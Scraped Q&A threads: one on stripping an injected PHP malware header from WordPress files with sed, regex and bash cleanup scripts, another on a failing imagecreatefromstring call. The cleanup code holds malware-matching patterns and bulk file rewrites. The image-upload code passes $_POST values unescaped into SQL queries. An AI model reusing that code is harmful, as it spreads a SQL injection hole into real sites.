I'm a bit lost with fseek, fwrite in the PHP doc, and don't really know which one I should use and how.
Waiting for your help :) !

You might want to switch tools for this job. Use sed(1):
$ sed -e '1 s/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php
You can write a thin exec() wrapper in PHP, if you have no shell access.

I am angry of ruined servers and I have written script as a class to solve this, when you don't have root access to server.
// Import and setup Guardian script
include '../NarniaGuardian/NarniaGuardian.php';
$Guard = new NarniaGD;
$Guard->cleanFiles('../wordpress/');
You would import code, point it to root of malware and update malware sample library until everything is clean.
Please, for more check here https://github.com/Pilskalns/Narnia-Guardian
OOP approach could be easy edited further to monitor if anything comes along again.

I write script to delete this malware.
function deleteMalware()
{
$directory_iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(ABSPATH, RecursiveDirectoryIterator::SKIP_DOTS));
foreach($directory_iterator as $filename => $file)
{
if ($file->getExtension() !== "php") {
continue;
}
$content = file_get_contents($filename);
$reg = '/<\?\s*php\s*if\(!isset\(\$GLOBALS\[\"\\\\x61(.*?)-1;\s*\?>/s';
$count = 0;
$newContent = preg_replace ($reg, '', $content, -1, $count);
if($count === 1) {
file_put_contents ($filename, $newContent);
}
}
};
I hope it helps :)

One of my customers had exactly the same issue and we had to run trough it, we found that there might be several types of PHP files and not all of them starts the same,
all the above solutions would work only if all PHP files on your server starts with ?php, anything else would damage your files.
The solution we used (provided below) catches all infected PHP files on your server, backup them (with it original path),restoring them into it orig state, and also write a summary file with the result
It works great for my customer (about 21000~ PHP files scanned and fixed in 7min)
In order to use it copy the below code into file on your home directory
name the file php_fix.sh
Make it executable by typing
chmod +x php_fix.sh
and run it:
./php_fix.sh y
You may also download it from my site:
http://okgamestudio.com/sites/igal/php_fix.sh
#!/bin/bash
infected_files=0
fixed_files=0
DATE=`date +"%d-%m-%y %T"`
find . -name "*.php" |grep -v 2fix > php_files.dat
php_files=`cat php_files.dat |wc -l`
if [ ! `ls 2fix` ]
then
mkdir 2fix
fi
while read file_name
do
if [[ `head -1 $file_name |grep GLOBALS` ]]
then
if [[ $1 == "y" ]]
then
fixed_string=`head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'`
cp --parents $file_name 2fix/
sed -i "1s/.*/$fixed_string/" $file_name
#sed -i "1s/.*/\<\?php/" $file_name
#sed -i '1d' $file_namea
let fixed_files=$fixed_files+1
else
let infected_files=$infected_files+1
fi
fi
done < php_files.dat
echo $DATE, "Scannded files:" $php_files, "Fixed files:" $fixed_files, "Infected: " $infected_files >> fixed_files.dat
exit
# head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'

I forked Narnia-Guardian for easy use and bugfix.
Download WordpressGuardian source code https://github.com/liruqi/WordpressGuardian
Backup your affected wordpress copy
bash NarniaGuardian.sh [path to wordpress root]
Find suspicious/malicious long-line unreable code, update pattern in blacklist.txt
Go back to step 2
This can clean up injected code.
Another possible approch is to find long lines in PHP file. And remove them or replace them with <?php if needed.

Using sed -i.bak 's/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php is working for me. Essentially just replacing -e with -i.bak

I had once to deal with this problem and I finally had to create an script to remove all lines from the /var/www directory.
You can see here https://stackoverflow.com/a/26285498/3000681
regards.

PHP's imagecreatefromstring function not working on Amazon Linux Server

I have created a script in which a i have to create a image at runtime using a 64bitencoded string .i m using imagecreatefromstring function of PHP but it works in my Windows XAMPP based PHP , but not on my cloud side applications which i deployed on Amazon cloud running SUSE version of Linux.
Can u give me any suggestion to overcome the problem.
Or is there any other function which is capable to create the image from the encoded string passed to it.
Thanks in adv
I am using following code
<?php
require ('../dbconfig/dbConfig.php');
$gameId = $_POST["gameId"];
$username = $_POST['email'];
$imagedata = $_POST['imagedata'];
$uploaddir = './../blogdata/i/';
$countSql = mysql_query("select max(_id) as fileName from blog_data ");
while($rowCommentData = mysql_fetch_assoc($countSql))
{
$num = $rowCommentData["fileName"];
$file = ++$num.".png";
$filedb = $uploaddir .$file;
}
/* $imagedata= 'iVBORw0KGgoAAAANSUhEUgAAABwAAAASCAMAAAB/2U7WAAAABl'
. 'BMVEUAAAD///+l2Z/dAAAASUlEQVR4XqWQUQoAIAxC2/0vXZDr'
. 'EX4IJTRkb7lobNUStXsB0jIXIAMSsQnWlsV+wULF4Avk9fLq2r'
. '8a5HSE35Q3eO2XP1A1wQkZSgETvDtKdQAAAABJRU5ErkJggg==';*/
$imagedata= base64_decode($imagedata);
if(($img = #imagecreatefromstring($imagedata)) !== FALSE)
{
if(imagepng($img,$filedb))
{
imagedestroy($img);
$sql="Insert into blog_data (game_id,text,type,username)".
"Values('$gameId','$file','i','$username')";
$result=mysql_query($sql);
if($result == 1)
{
echo $file;
}
else
{
echo "error2";
}
}
else {
echo "error1";
}
}
else
{
echo "error0";
}
?>
By running PHP info there i got this information

The PHP needs to have the libgd extension installed and loaded. Check phpinfo() if it's there. You probably can install it via yum. The package should be called php5-gd

From your code, it seems that you dont have the GD extension installed. Please check the phpinfo output and look for the GD extension

You will need root access to the server, which I don't think you get with Amazon's cloud service. You will need to recompile php with --with-gd flag.
http://www.php.net/manual/en/image.installation.php

Categories